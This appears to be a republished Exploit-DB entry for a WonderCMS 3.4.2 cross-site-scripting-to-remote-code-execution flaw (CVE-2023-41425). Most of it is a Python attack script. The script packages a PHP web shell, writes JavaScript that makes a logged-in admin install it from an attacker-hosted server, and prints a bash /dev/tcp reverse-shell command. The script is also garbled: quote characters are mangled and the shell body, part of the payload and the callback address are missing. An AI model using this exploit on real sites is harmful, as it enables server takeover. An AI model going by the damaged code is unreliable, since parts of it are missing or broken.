Exploit Details
Basic Information
| Exploit Title | WonderCMS 3.4.2 – Remote Code Execution (RCE) |
|---|---|
| Exploit ID | EDB-ID:52271 |
| Type | exploitdb |
| Published | 2025-04-22T00:00:00 |
| Modified | 2025-04-22T00:00:00 |
CVSS Information
| CVSS Score | 6.1 |
|---|---|
| Severity | MEDIUM |
| Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
CVE Information
- CVE-2023-41425
Exploit Description
Exploit Code
# Date: 2025-04-16
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: [email protected]
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# MiRROR-H: https://mirror-h.org/search/hacker/49626/
# CVE: CVE-2023-41425
import requests
import argparse
from argparse import RawTextHelpFormatter
import os
import subprocess
import zipfile
from termcolor import colored
def main():
parser = argparse.ArgumentParser(description=”Exploit Wonder CMS v3.4.2
XSS to RCE”, formatter_class=RawTextHelpFormatter)
parser.add_argument(“–url”, required=True, help=”Target URL of
loginURL (Example: http://sea.htb/loginURL)”)
parser.add_argument(“–xip”, required=True, help=”IP for HTTP web
server that hosts the malicious .js file”)
parser.add_argument(“–xport”, required=True, help=”Port for HTTP web
server that hosts the malicious .js file”)
args = parser.parse_args()
target_login_url = args.url
target_split = args.url.split(‘/’)
target_url = target_split[0] + ‘//’ + target_split[2]
# Web Shell
print(“[+] Creating PHP Web Shell”)
if not os.path.exists(‘malicious’):
os.mkdir(‘malicious’)
with open (‘malicious/malicious.php’, ‘w’) as f:
f.write(‘‘)
with zipfile.ZipFile(‘./malicious.zip’, ‘w’) as z:
z.write(‘malicious/malicious.php’)
os.remove(‘malicious/malicious.php’)
os.rmdir(‘malicious’)
else:
print(colored(“[!] Directory malicious already exists!”, ‘yellow’))
# Malicious .js
js = f”’var token =
document.querySelectorAll(‘[name=”token”]’)[0].value;
var module_url =
“{target_url}/?installModule=http://{args.xip}:{args.xport}/malicious.zip&directoryName=pwned&type=themes&token=”
+ token;
var xhr = new XMLHttpRequest();
xhr.withCredentials = true;
xhr.open(“GET”, module_url);
xhr.send();”’
print(“[+] Writing malicious.js”)
with open(‘malicious.js’, ‘w’) as f:
f.write(js)
xss_payload = args.url.replace(“loginURL”,
“index.php?page=loginURL?”)+”\”>
print(colored(f”{xss_payload}”, ‘red’))
print(“[+] Web Shell can be accessed once .zip file has been
requested:”)
print(colored(f”{target_url}/themes/malicious/malicious.php?cmd=
‘red’))
print(“[+] To get a reverse shell connection run the following:”)
print(colored(f”curl -s ‘{target_url}/themes/malicious/malicious.php’
–get –data-urlencode \”cmd=bash -c ‘bash -i >& /dev/tcp/
0>&1’\” “, ‘yellow’))
print(“[+] Starting HTTP server”)
subprocess.run([“python3”, “-m”, “http.server”, “-b”, args.xip,
args.xport])
if __name__ == “__main__”:
main()